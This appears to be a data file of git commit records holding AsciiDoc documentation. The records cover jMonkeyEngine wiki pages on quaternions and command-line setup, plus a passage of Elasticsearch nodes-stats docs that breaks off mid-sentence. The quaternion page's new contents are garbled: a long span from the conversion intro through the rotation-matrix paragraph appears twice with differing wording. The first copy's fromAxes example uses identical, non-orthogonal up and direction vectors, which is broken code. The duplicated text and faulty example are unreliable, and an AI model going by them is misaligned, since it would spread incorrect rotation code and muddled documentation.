{"commit":"2e2b1a4d2b0e4646b41fc75304f4866c44033f60","subject":"Capitalized title.","message":"Capitalized title.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/quaternion.adoc","new_file":"src\/docs\/asciidoc\/jme3\/quaternion.adoc","new_contents":"= Quaternion\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Quaternion\n\nSee link:https:\/\/javadoc.jmonkeyengine.org\/index.html?com\/jme3\/math\/Quaternion.html[Javadoc]\n\n\n=== Definition\n\nQuaternions define a subset of a hypercomplex number system. Quaternions are defined by (i^2^ = j^2^ = k^2^ = ijk = -1). jME makes use of Quaternions because they allow for compact representations of rotations, or correspondingly, orientations, in 3D space. With only four float values, we can represent an object's orientation, where a rotation matrix would require nine. They also require fewer arithmetic operations for concatenation.\n\nAdditional benefits of the Quaternion are reducing the chance of link:http:\/\/en.wikipedia.org\/wiki\/Gimbal_lock[Gimbal Lock] and allowing for easy interpolation between two rotations (spherical linear interpolation or slerp).\n\nWhile Quaternions are quite difficult to fully understand, there are a large number of convenience methods to allow you to use them without having to understand the math behind it. Basically, these methods involve nothing more than setting the Quaternion's x,y,z,w values using other means of representing rotations. 
The Quaternion is then contained in <<jme3\/advanced\/spatial#,Spatial>> as its local rotation component.\n\nQuaternion *q* has the form\n\n*q* = <_w,x,y,z_> = _w + xi + yj + zk_\n\nor alternatively, it can be written as:\n\n*q* = *s* + *v*, where *s* represents the scalar part corresponding to the w-component of *q*, and *v* represents the vector part of the (x, y, z) components of *q*.\n\nMultiplication of Quaternions uses the distributive law and adheres to the following rules when multiplying the imaginary components (i, j, k):\n\n`i^2^ = j^2^ = k^2^ = -1`+\n`ij = -ji = k`+\n`jk = -kj = i`+\n`ki = -ik = j`\n\nHowever, Quaternion multiplication is _not_ commutative, so we have to pay attention to order.\n\n*q~1~q~2~* = s~1~s~2~ - *v~1~* dot *v~2~* + s~1~*v~2~* + s~2~*v~1~* + *v~1~* X *v~2~*\n\nQuaternions also have conjugates where the conjugate of *q* is (s - *v*)\n\nThese basic operations allow us to convert various rotation representations to Quaternions.\n\n\n=== Angle Axis\n\nYou might wish to represent your rotations as Angle Axis pairs. That is, you define an axis of rotation and the angle with which to rotate about this axis. Quaternion defines a method `fromAngleAxis` (and `fromAngleNormalAxis`) to create a Quaternion from this pair. This is actually used quite a bit in jME demos to continually rotate objects. You can also obtain an Angle Axis rotation from an existing Quaternion using `toAngleAxis`.\n\n\n==== Example - Rotate a Spatial Using fromAngleAxis\n\n[source,java]\n----\n\n\/\/rotate about the Y-Axis by approximately 1 pi\nVector3f axis = Vector3f.UNIT_Y; \/\/ this equals (0, 1, 0) and does not require creating a new object\nfloat angle = 3.14f;\ns.getLocalRotation().fromAngleAxis(angle, axis);\n\n----\n\n\n=== Three Angles\n\nYou can also represent a rotation by defining three angles. The angles represent the rotation about the individual axes. Passing in a three-element array of floats defines the angles where the first element is X, second Y and third is Z. The method provided by Quaternion is `fromAngles` and can also fill an array using `toAngles`.\n\n\n==== Example - Rotate a Spatial Using fromAngles\n\n[source,java]\n----\n\n\/\/rotate 1 radian on the x, 3 on the y and 0 on z\nfloat[] angles = {1, 3, 0};\ns.getLocalRotation().fromAngles(angles);\n\n----\n\n\n=== Three Axes\n\nIf you have three axes that define your rotation (where the axes define the left axis, up axis and directional axis, respectively), you can make use of `fromAxes` to generate the Quaternion. It should be noted that this will generate a new <<jme3\/matrix#,Matrix>> object that is then garbage collected, thus this method should not be used if it will be called many times. Again, `toAxes` will populate a <<jme3\/terminology#vectors,Vector3f>> array.\n\n\n==== Example - Rotate a Spatial Using fromAxes\n\n[source,java]\n----\n\n\/\/rotate a spatial to face up ~45 degrees\nVector3f[] axes = new Vector3f[3];\naxes[0] = new Vector3f(-1, 0, 0); \/\/left\naxes[1] = new Vector3f(0, 0.5f, 0.5f); \/\/up\naxes[2] = new Vector3f(0, 0.5f, 0.5f); \/\/dir\n\ns.getLocalRotation().fromAxes(axes);\n\n----\n\n\n=== Rotation Matrix\n\nCommonly you might find yourself with a Matrix defining a rotation. In fact, it's very common to store a rotation in a Matrix, create a Quaternion, rotate the Quaternion, and then get the Matrix back. Quaternion contains a `fromRotationMatrix` method that will create the appropriate Quaternion based on the given Matrix. 
These basic operations allow us to convert various rotation representations to Quaternions.\n\n\n=== Angle Axis\n\nYou might wish to represent your rotations as Angle Axis pairs. That is, you define an axis of rotation and the angle with which to rotate about this axis. Quaternion defines a method `fromAngleAxis` (and `fromAngleNormalAxis`) to create a Quaternion from this pair. This is actually used quite a bit in jME demos to continually rotate objects. You can also obtain an Angle Axis rotation from an existing Quaternion using `toAngleAxis`.\n\n\n==== Example - Rotate a Spatial Using fromAngleAxis\n\n[source,java]\n----\n\n\/\/rotate about the Y-Axis by approximately 1 pi\nVector3f axis = Vector3f.UNIT_Y; \/\/ this equals (0, 1, 0) and does not require creating a new object\nfloat angle = 3.14f;\ns.getLocalRotation().fromAngleAxis(angle, axis);\n\n----\n\n\n=== Three Angles\n\nYou can also represent a rotation by defining three angles. The angles represent the rotation about the individual axes. Passing in a three-element array of floats defines the angles, where the first element is X, the second is Y, and the third is Z. The method provided by Quaternion is `fromAngles`; it can also fill an array using `toAngles`.\n\n\n==== Example - Rotate a Spatial Using fromAngles\n\n[source,java]\n----\n\n\/\/rotate 1 radian on the x, 3 on the y and 0 on z\nfloat[] angles = {1, 3, 0};\ns.getLocalRotation().fromAngles(angles);\n\n----\n\n\n=== Three Axes\n\nIf you have three axes that define your rotation (the axes define the left axis, up axis, and directional axis, respectively), you can make use of `fromAxes` to generate the Quaternion. It should be noted that this will generate a new <<jme3\/matrix#,Matrix>> object that is then garbage collected; thus, this method should not be used if it will be called many times. Again, `toAxes` will populate a <<jme3\/terminology#vectors,Vector3f>> array.\n\n\n==== Example - Rotate a Spatial Using fromAxes\n\n[source,java]\n----\n\n\/\/rotate a spatial to face up ~45 degrees\n\/\/ the three axes must be mutually orthogonal unit vectors\nVector3f[] axes = new Vector3f[3];\naxes[0] = new Vector3f(-1, 0, 0); \/\/left\naxes[1] = new Vector3f(0, 0.707f, 0.707f); \/\/up\naxes[2] = new Vector3f(0, 0.707f, -0.707f); \/\/dir\n\ns.getLocalRotation().fromAxes(axes);\n\n----\n\n\n=== Rotation Matrix\n\nCommonly you might find yourself with a Matrix defining a rotation. In fact, it's very common to store a rotation in a Matrix, create a Quaternion, rotate the Quaternion, and then get the Matrix back. Quaternion contains a `fromRotationMatrix` method that will create the appropriate Quaternion based on the given Matrix. The `toRotationMatrix` will populate a given Matrix.\n\n\n==== Example - Rotate a Spatial Using a Rotation Matrix\n\n[source,java]\n----\n\n\nMatrix3f mat = new Matrix3f();\n\/\/ a 180-degree rotation around the X axis; note that a rotation matrix must have determinant +1\nmat.setColumn(0, new Vector3f(1,0,0));\nmat.setColumn(1, new Vector3f(0,-1,0));\nmat.setColumn(2, new Vector3f(0,0,-1));\n\ns.getLocalRotation().fromRotationMatrix(mat);\n\n----\n\nAs you can see, there are many ways to build a Quaternion. This allows you to work with rotations in a way that is conceptually easier to picture, but still build Quaternions for internal representation.\n\n\n=== Slerp\n\nOne of the biggest advantages of using Quaternions is that they allow interpolation between two rotations. That is, if you have an initial Quaternion representing the original orientation of an object, and you have a final Quaternion representing the orientation you want the object to face, you can do this very smoothly with slerp. Simply supply the time, where time is in [0, 1]; 0 is the initial rotation and 1 is the final rotation.\n\n\n==== Example - Use Slerp to Rotate Between two Quaternions\n\n[source,java]\n----\n\nQuaternion q1; \/\/ assume this holds the initial rotation\nQuaternion q2; \/\/ assume this holds the final rotation\n\n\/\/the rotation half-way between these two\nQuaternion q3 = q1.slerp(q2, 0.5f);\n\n----\n","old_contents":"= quaternion\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Quaternion\n\nSee link:https:\/\/javadoc.jmonkeyengine.org\/index.html?com\/jme3\/math\/Quaternion.html[Javadoc]\n\n\n=== Definition\n\nQuaternions define a subset of a hypercomplex number system. Quaternions are defined by (i^2^ = j^2^ = k^2^ = ijk = -1). jME makes use of Quaternions because they allow for compact representations of rotations, or correspondingly, orientations, in 3D space. With only four float values, we can represent an object's orientation, where a rotation matrix would require nine. They also require fewer arithmetic operations for concatenation.\n\nAdditional benefits of the Quaternion are that it reduces the chance of link:http:\/\/en.wikipedia.org\/wiki\/Gimbal_lock[Gimbal Lock] and allows for easy interpolation between two rotations (spherical linear interpolation or slerp).\n\nWhile Quaternions are quite difficult to fully understand, there is an exceedingly large number of convenience methods that allow you to use them without having to understand the math behind them. Basically, these methods involve nothing more than setting the Quaternion's x,y,z,w values using other means of representing rotations. 
The Quaternion is then contained in <<jme3\/advanced\/spatial#,Spatial>> as its local rotation component.\n\nQuaternion *q* has the form\n\n*q* = <_w,x,y,z_> = _w + xi + yj + zk_\n\nor alternatively, it can be written as:\n\n*q* = *s* + *v*, where *s* represents the scalar part corresponding to the w-component of *q*, and *v* represents the vector part of the (x, y, z) components of *q*.\n\nMultiplication of Quaternions uses the distributive law and adheres to the following rules when multiplying the imaginary components (i, j, k):\n\n`i^2^ = j^2^ = k^2^ = -1`+\n`ij = -ji = k`+\n`jk = -kj = i`+\n`ki = -ik = j`\n\nHowever, Quaternion multiplication is _not_ commutative, so we have to pay attention to order.\n\n*q~1~q~2~* = s~1~s~2~ - *v~1~* dot *v~2~* + s~1~*v~2~* + s~2~*v~1~* + *v~1~* X *v~2~*\n\nHere the first two terms (s~1~s~2~ - *v~1~* dot *v~2~*) form the scalar part of the product, and the remaining terms form its vector part.\n\nQuaternions also have conjugates, where the conjugate of *q* is (s - *v*).\n\nThese basic operations allow us to convert various rotation representations to Quaternions.\n\n\n=== Angle Axis\n\nYou might wish to represent your rotations as Angle Axis pairs. That is, you define an axis of rotation and the angle with which to rotate about this axis. Quaternion defines a method `fromAngleAxis` (and `fromAngleNormalAxis`) to create a Quaternion from this pair. This is actually used quite a bit in jME demos to continually rotate objects. You can also obtain an Angle Axis rotation from an existing Quaternion using `toAngleAxis`.\n\n\n==== Example - Rotate a Spatial Using fromAngleAxis\n\n[source,java]\n----\n\n\/\/rotate about the Y-Axis by approximately 1 pi\nVector3f axis = Vector3f.UNIT_Y; \/\/ this equals (0, 1, 0) and does not require creating a new object\nfloat angle = 3.14f;\ns.getLocalRotation().fromAngleAxis(angle, axis);\n\n----\n\n\n=== Three Angles\n\nYou can also represent a rotation by defining three angles. The angles represent the rotation about the individual axes. Passing in a three-element array of floats defines the angles, where the first element is X, the second is Y, and the third is Z. The method provided by Quaternion is `fromAngles`; it can also fill an array using `toAngles`.\n\n\n==== Example - Rotate a Spatial Using fromAngles\n\n[source,java]\n----\n\n\/\/rotate 1 radian on the x, 3 on the y and 0 on z\nfloat[] angles = {1, 3, 0};\ns.getLocalRotation().fromAngles(angles);\n\n----\n\n\n=== Three Axes\n\nIf you have three axes that define your rotation (the axes define the left axis, up axis, and directional axis, respectively), you can make use of `fromAxes` to generate the Quaternion. It should be noted that this will generate a new <<jme3\/matrix#,Matrix>> object that is then garbage collected; thus, this method should not be used if it will be called many times. Again, `toAxes` will populate a <<jme3\/terminology#vectors,Vector3f>> array.\n\n\n==== Example - Rotate a Spatial Using fromAxes\n\n[source,java]\n----\n\n\/\/rotate a spatial to face up ~45 degrees\n\/\/ the three axes must be mutually orthogonal unit vectors\nVector3f[] axes = new Vector3f[3];\naxes[0] = new Vector3f(-1, 0, 0); \/\/left\naxes[1] = new Vector3f(0, 0.707f, 0.707f); \/\/up\naxes[2] = new Vector3f(0, 0.707f, -0.707f); \/\/dir\n\ns.getLocalRotation().fromAxes(axes);\n\n----\n\n\n=== Rotation Matrix\n\nCommonly you might find yourself with a Matrix defining a rotation. In fact, it's very common to store a rotation in a Matrix, create a Quaternion, rotate the Quaternion, and then get the Matrix back. Quaternion contains a `fromRotationMatrix` method that will create the appropriate Quaternion based on the given Matrix. 
The `toRotationMatrix` will populate a given Matrix.\n\n\n==== Example - Rotate a Spatial Using a Rotation Matrix\n\n[source,java]\n----\n\n\nMatrix3f mat = new Matrix3f();\n\/\/ a 180-degree rotation around the X axis; note that a rotation matrix must have determinant +1\nmat.setColumn(0, new Vector3f(1,0,0));\nmat.setColumn(1, new Vector3f(0,-1,0));\nmat.setColumn(2, new Vector3f(0,0,-1));\n\ns.getLocalRotation().fromRotationMatrix(mat);\n\n----\n\nAs you can see, there are many ways to build a Quaternion. This allows you to work with rotations in a way that is conceptually easier to picture, but still build Quaternions for internal representation.\n\n\n=== Slerp\n\nOne of the biggest advantages of using Quaternions is that they allow interpolation between two rotations. That is, if you have an initial Quaternion representing the original orientation of an object, and you have a final Quaternion representing the orientation you want the object to face, you can do this very smoothly with slerp. Simply supply the time, where time is in [0, 1]; 0 is the initial rotation and 1 is the final rotation.\n\n\n==== Example - Use Slerp to Rotate Between two Quaternions\n\n[source,java]\n----\n\nQuaternion q1; \/\/ assume this holds the initial rotation\nQuaternion q2; \/\/ assume this holds the final rotation\n\n\/\/the rotation half-way between these two\nQuaternion q3 = q1.slerp(q2, 0.5f);\n\n----\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"f75e74f3c8169543ad4bb431408cd896852fc1ee","subject":"Updated admonition.","message":"Updated admonition.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/simpleapplication_from_the_commandline.adoc","new_file":"src\/docs\/asciidoc\/jme3\/simpleapplication_from_the_commandline.adoc","new_contents":"= Starting a JME3 application from the Commandline\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:keywords: documentation, install\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nAlthough we recommend the jMonkeyEngine <<sdk#,SDK>> for developing JME3 games, you can use any IDE (integrated development environment) such as <<jme3\/setting_up_netbeans_and_jme3#,NetBeans>> or <<jme3\/setting_up_jme3_in_eclipse#,Eclipse>>, and even work freely from the commandline. Here is a generic IDE-independent \"`getting started`\" tutorial.\n\nThis example shows how to set up and run a simple application (HelloJME3) that depends on the jMonkeyEngine3 libraries.\n\nThe directory structure will look as follows:\n\n[source]\n----\n\njme3\/\njme3\/lib\njme3\/src\n...\nHelloJME3\/\nHelloJME3\/lib\nHelloJME3\/assets\nHelloJME3\/src\n...\n----\n\n\n== Installing the JME3 Framework\n\nTo install the development version of jme3, download the latest link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/releases[stable release] and unzip the archive into a directory named `jme3`. The filenames here are just an example, but they will always be something like `jME3.x-stable`.\n\n[source]\n----\n\nmkdir jme3\ncd jme3\nunzip jME3.1-stable.zip\n\n----\n\nAlternatively, you can build JME3 from the sources. 
(Recommended for JME3 developers.)\n\n[source]\n----\nsvn checkout https:\/\/jmonkeyengine.googlecode.com\/svn\/branches\/3.0final\/engine jme3\ncd jme3\nant run\ncd ..\n----\n\nIf you see a Test Chooser application open now, the build was successful.\n\nTIP: Use just ant instead of ant run to build the libraries without running the demos.\n\n== Sample Project Directory Structure\n\nFirst we set up the directory and source package structure for your game project. Note that the game project directory `HelloJME3` is on the same level as your `jme3` checkout. In this example, we create a Java package that we call `hello` in the source directory.\n\n[source]\n----\n\nmkdir HelloJME3\nmkdir HelloJME3\/src\nmkdir HelloJME3\/src\/hello\n\n----\n\n\n== Libraries\n\nNext you copy the necessary JAR libraries from the download to your project. You only have to do this set of steps once every time you download a new JME3 build. For a detailed description of the separate jar files see <<jme3\/jme3_source_structure#structure_of_jmonkeyengine3_jars,this list>>.\n\n[source]\n----\n\nmkdir HelloJME3\/build\nmkdir HelloJME3\/lib\ncp jme3\/lib\/*.* HelloJME3\/lib\n\n----\n\nIf you have built JME3 from the sources, then the copy paths are different:\n\n[source]\n----\n\nmkdir HelloJME3\/build\nmkdir HelloJME3\/lib\ncp jme3\/dist\/*.* HelloJME3\/lib\n\n----\n\n\n=== Sample Code\n\nTo test your setup, create the file `HelloJME3\/src\/hello\/HelloJME3.java` with any text editor, paste the following sample code, and save.\n\n[source,java]\n----\n\npackage hello;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.material.Material;\nimport com.jme3.math.Vector3f;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\nimport com.jme3.math.ColorRGBA;\n\npublic class HelloJME3 extends SimpleApplication {\n\n public static void main(String[] args){\n HelloJME3 app = new HelloJME3();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n Box b = new Box(Vector3f.ZERO, 1, 1, 1);\n Geometry geom = new Geometry(\"Box\", b);\n Material mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n mat.setColor(\"Color\", ColorRGBA.Blue);\n geom.setMaterial(mat);\n rootNode.attachChild(geom);\n }\n}\n----\n\n\n== Build and Run\n\nWe build the sample application into the build directory\u2026\n\n[source]\n----\n\ncd HelloJME3\njavac -d build -cp \"lib\/eventbus-1.4.jar:lib\/j-ogg-oggd.jar:lib\/j-ogg-vorbisd.jar:lib\/jME3-lwjgl-natives.jar:lib\/jbullet.jar:lib\/jinput.jar:lib\/lwjgl.jar:lib\/stack-alloc.jar:lib\/vecmath.jar:lib\/xmlpull-xpp3-1.1.4c.jar:lib\/jME3-blender.jar:lib\/jME3-core.jar:lib\/jME3-desktop.jar:lib\/jME3-jogg.jar:lib\/jME3-plugins.jar:lib\/jME3-terrain.jar:lib\/jME3-testdata.jar:lib\/jME3-niftygui.jar:lib\/nifty-default-controls.jar:lib\/nifty-examples.jar:lib\/nifty-style-black.jar:lib\/nifty.jar:.\" src\/hello\/HelloJME3.java\n\n----\n\n\u2026 and run it.\n\n[source]\n----\n\ncd build\njava -cp \"..\/lib\/eventbus-1.4.jar:..\/lib\/j-ogg-oggd.jar:..\/lib\/j-ogg-vorbisd.jar:..\/lib\/jME3-lwjgl-natives.jar:..\/lib\/jbullet.jar:..\/lib\/jinput.jar:..\/lib\/lwjgl.jar:..\/lib\/stack-alloc.jar:..\/lib\/vecmath.jar:..\/lib\/xmlpull-xpp3-1.1.4c.jar:..\/lib\/jME3-blender.jar:..\/lib\/jME3-core.jar:..\/lib\/jME3-desktop.jar:..\/lib\/jME3-jogg.jar:..\/lib\/jME3-plugins.jar:..\/lib\/jME3-terrain.jar:..\/lib\/jME3-testdata.jar:..\/lib\/jME3-niftygui.jar:..\/lib\/nifty-default-controls.jar:..\/lib\/nifty-examples.jar:..\/lib\/nifty-style-black.jar:..\/lib\/nifty.jar:.\" 
hello\/HelloJME3\n----\n\nNOTE: If you use Windows, the classpath separator is kbd:[;] instead of kbd:[:], and the path separator is kbd:[\\ ] instead of kbd:[\/].\n\n
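For example, on Windows the run command from above becomes the following (a sketch only, assuming the same `lib` layout as in this tutorial):\n\n[source]\n----\n\ncd build\njava -cp \"..\\lib\\eventbus-1.4.jar;..\\lib\\j-ogg-oggd.jar;..\\lib\\j-ogg-vorbisd.jar;..\\lib\\jME3-lwjgl-natives.jar;..\\lib\\jbullet.jar;..\\lib\\jinput.jar;..\\lib\\lwjgl.jar;..\\lib\\stack-alloc.jar;..\\lib\\vecmath.jar;..\\lib\\xmlpull-xpp3-1.1.4c.jar;..\\lib\\jME3-blender.jar;..\\lib\\jME3-core.jar;..\\lib\\jME3-desktop.jar;..\\lib\\jME3-jogg.jar;..\\lib\\jME3-plugins.jar;..\\lib\\jME3-terrain.jar;..\\lib\\jME3-testdata.jar;..\\lib\\jME3-niftygui.jar;..\\lib\\nifty-default-controls.jar;..\\lib\\nifty-examples.jar;..\\lib\\nifty-style-black.jar;..\\lib\\nifty.jar;.\" hello\/HelloJME3\n----\n\n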
If a settings dialog pops up, confirm the default settings. You should now see a simple window with a 3-D cube. Use the mouse and the WASD keys to move. It works!\n\n\n== Recommended Asset Directory Structure\n\nFor <<jme3\/intermediate\/multi-media_asset_pipeline#,multi-media files, models, and other assets>>, we recommend creating the following project structure:\n\n[source]\n----\n\ncd HelloJME3\nmkdir assets\nmkdir assets\/Interface\nmkdir assets\/Materials\nmkdir assets\/MatDefs\nmkdir assets\/Models\nmkdir assets\/Scenes\nmkdir assets\/Shaders\nmkdir assets\/Sounds\nmkdir assets\/Textures\n\n----\n\nThis directory structure will allow <<jme3\/intermediate\/simpleapplication#,SimpleApplication>>'s default <<jme3\/advanced\/asset_manager#,AssetManager>> to load media files from your `assets` directory, like in this example:\n\n[source]\n----\n\nimport com.jme3.scene.Spatial;\n...\n Spatial elephant = assetManager.loadModel(\"Models\/Elephant\/Elephant.mesh.xml\");\n rootNode.attachChild(elephant);\n...\n\n----\n\nYou will learn more about the asset manager and how to customize it later. For now feel free to structure your assets (images, textures, models) into further sub-directories, like in this example the `assets\/Models\/Elephant` directory that contains the `Elephant.mesh.xml` model and its materials.\n\n\n== Next Steps\n\nNow follow the <<jme3#,tutorials>> and write your first jMonkeyEngine game.\n","old_contents":"= Starting a JME3 application from the Commandline\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:keywords: documentation, install\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental: \nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nAlthough we recommend the jMonkeyEngine <<sdk#,SDK>> for developing JME3 games, you can use any IDE (integrated development environment) such as <<jme3\/setting_up_netbeans_and_jme3#,NetBeans>> or <<jme3\/setting_up_jme3_in_eclipse#,Eclipse>>, and even work freely from the commandline. Here is a generic IDE-independent \"`getting started`\" tutorial.\n\nThis example shows how to set up and run a simple application (HelloJME3) that depends on the jMonkeyEngine3 libraries.\n\nThe directory structure will look as follows:\n\n[source]\n----\n\njme3\/\njme3\/lib\njme3\/src\n...\nHelloJME3\/\nHelloJME3\/lib\nHelloJME3\/assets\nHelloJME3\/src\n...\n----\n\n\n== Installing the JME3 Framework\n\nTo install the development version of jme3, download the latest link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/releases[stable release] and unzip the archive into a directory named `jme3`. The filenames here are just an example, but they will always be something like `jME3.x-stable`.\n\n[source]\n----\n\nmkdir jme3\ncd jme3\nunzip jME3.1-stable.zip\n\n----\n\nAlternatively, you can build JME3 from the sources. (Recommended for JME3 developers.)\n\n[source]\n----\nsvn checkout https:\/\/jmonkeyengine.googlecode.com\/svn\/branches\/3.0final\/engine jme3\ncd jme3\nant run\ncd ..\n----\n\nIf you see a Test Chooser application open now, the build was successful.\n\nTIP: Use just ant instead of ant run to build the libraries without running the demos.\n\n== Sample Project Directory Structure\n\nFirst we set up the directory and source package structure for your game project. Note that the game project directory `HelloJME3` is on the same level as your `jme3` checkout. In this example, we create a Java package that we call `hello` in the source directory.\n\n[source]\n----\n\nmkdir HelloJME3\nmkdir HelloJME3\/src\nmkdir HelloJME3\/src\/hello\n\n----\n\n\n== Libraries\n\nNext you copy the necessary JAR libraries from the download to your project. You only have to do this set of steps once every time you download a new JME3 build. For a detailed description of the separate jar files see <<jme3\/jme3_source_structure#structure_of_jmonkeyengine3_jars,this list>>.\n\n[source]\n----\n\nmkdir HelloJME3\/build\nmkdir HelloJME3\/lib\ncp jme3\/lib\/*.* HelloJME3\/lib\n\n----\n\nIf you have built JME3 from the sources, then the copy paths are different:\n\n[source]\n----\n\nmkdir HelloJME3\/build\nmkdir HelloJME3\/lib\ncp jme3\/dist\/*.* HelloJME3\/lib\n\n----\n\n\n=== Sample Code\n\nTo test your setup, create the file `HelloJME3\/src\/hello\/HelloJME3.java` with any text editor, paste the following sample code, and save.\n\n[source,java]\n----\n\npackage hello;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.material.Material;\nimport com.jme3.math.Vector3f;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\nimport com.jme3.math.ColorRGBA;\n\npublic class HelloJME3 extends SimpleApplication {\n\n public static void main(String[] args){\n HelloJME3 app = new HelloJME3();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n Box b = new Box(Vector3f.ZERO, 1, 1, 1);\n Geometry geom = new Geometry(\"Box\", b);\n Material mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n mat.setColor(\"Color\", ColorRGBA.Blue);\n geom.setMaterial(mat);\n rootNode.attachChild(geom);\n }\n}\n----\n\n\n== Build and Run\n\nWe build the sample application into the build directory\u2026\n\n[source]\n----\n\ncd HelloJME3\njavac -d build -cp \"lib\/eventbus-1.4.jar:lib\/j-ogg-oggd.jar:lib\/j-ogg-vorbisd.jar:lib\/jME3-lwjgl-natives.jar:lib\/jbullet.jar:lib\/jinput.jar:lib\/lwjgl.jar:lib\/stack-alloc.jar:lib\/vecmath.jar:lib\/xmlpull-xpp3-1.1.4c.jar:lib\/jME3-blender.jar:lib\/jME3-core.jar:lib\/jME3-desktop.jar:lib\/jME3-jogg.jar:lib\/jME3-plugins.jar:lib\/jME3-terrain.jar:lib\/jME3-testdata.jar:lib\/jME3-niftygui.jar:lib\/nifty-default-controls.jar:lib\/nifty-examples.jar:lib\/nifty-style-black.jar:lib\/nifty.jar:.\" src\/hello\/HelloJME3.java\n\n----\n\n\u2026 and run it.\n\n[source]\n----\n\ncd build\njava -cp \"..\/lib\/eventbus-1.4.jar:..\/lib\/j-ogg-oggd.jar:..\/lib\/j-ogg-vorbisd.jar:..\/lib\/jME3-lwjgl-natives.jar:..\/lib\/jbullet.jar:..\/lib\/jinput.jar:..\/lib\/lwjgl.jar:..\/lib\/stack-alloc.jar:..\/lib\/vecmath.jar:..\/lib\/xmlpull-xpp3-1.1.4c.jar:..\/lib\/jME3-blender.jar:..\/lib\/jME3-core.jar:..\/lib\/jME3-desktop.jar:..\/lib\/jME3-jogg.jar:..\/lib\/jME3-plugins.jar:..\/lib\/jME3-terrain.jar:..\/lib\/jME3-testdata.jar:..\/lib\/jME3-niftygui.jar:..\/lib\/nifty-default-controls.jar:..\/lib\/nifty-examples.jar:..\/lib\/nifty-style-black.jar:..\/lib\/nifty.jar:.\" hello\/HelloJME3\n----\n\nNOTE: If you use Windows, the classpath separator is kbd:[;] instead of kbd:[:], and the path separator is kbd:[\\ ] instead of kbd:[\/].\n\nIf a settings dialog pops up, confirm the default settings. You should now see a simple window with a 3-D cube. Use the mouse and the WASD keys to move. 
It works!\n\n\n== Recommended Asset Directory Structure\n\nFor <<jme3\/intermediate\/multi-media_asset_pipeline#,multi-media files, models, and other assets>>, we recommend creating the following project structure:\n\n[source]\n----\n\ncd HelloJME3\nmkdir assets\nmkdir assets\/Interface\nmkdir assets\/Materials\nmkdir assets\/MatDefs\nmkdir assets\/Models\nmkdir assets\/Scenes\nmkdir assets\/Shaders\nmkdir assets\/Sounds\nmkdir assets\/Textures\n\n----\n\nThis directory structure will allow <<jme3\/intermediate\/simpleapplication#,SimpleApplication>>'s default <<jme3\/advanced\/asset_manager#,AssetManager>> to load media files from your `assets` directory, like in this example:\n\n[source]\n----\n\nimport com.jme3.scene.Spatial;\n...\n Spatial elephant = assetManager.loadModel(\"Models\/Elephant\/Elephant.mesh.xml\");\n rootNode.attachChild(elephant);\n...\n\n----\n\nYou will learn more about the asset manager and how to customize it later. For now feel free to structure your assets (images, textures, models) into further sub-directories, like in this example the `assets\/Models\/Elephant` directory that contains the `Elephant.mesh.xml` model and its materials.\n\n\n== Next Steps\n\nNow follow the <<jme3#,tutorials>> and write your first jMonkeyEngine game.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"a025c9c2eb1564033eb148a8d157ae70849b108c","subject":"Clarify requesting all stats in node stats docs","message":"Clarify requesting all stats in node stats docs\n\nThis commit clarifies how to explicitly obtain all stats from the node\nstats API.\n","repos":"strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test","old_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_contents":"[[cluster-nodes-stats]]\n== Nodes Stats\n\n[float]\n=== Nodes statistics\n\nThe cluster nodes stats API allows you to retrieve one or more (or all) of\nthe cluster nodes statistics.\n\n[source,js]\n--------------------------------------------------\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/nodeId1,nodeId2\/stats'\n--------------------------------------------------\n\nThe first command retrieves stats of all the nodes in the cluster. The\nsecond command selectively retrieves nodes stats of only `nodeId1` and\n`nodeId2`. All the nodes selective options are explained\n<<cluster-nodes,here>>.\n\nBy default, all stats are returned. You can limit this by combining any\nof `indices`, `os`, `process`, `jvm`, `transport`, `http`,\n`fs`, `breaker` and `thread_pool`. 
